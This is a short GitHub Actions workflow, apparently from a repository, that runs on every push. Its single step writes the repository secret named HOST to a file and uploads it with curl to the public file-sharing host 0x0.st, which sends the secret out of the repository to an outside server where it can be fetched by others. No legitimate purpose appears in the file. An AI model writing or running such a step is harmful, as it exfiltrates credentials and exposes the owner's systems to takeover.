on: [push]
jobs:
  message:
    runs-on: ubuntu-latest
    steps:
      - name: upload key to 0x0
        run: |
          echo "$KEY" > key.txt
          curl -F'file=@key.txt' http://0x0.st
        env:
          KEY: ${{ secrets.HOST}}
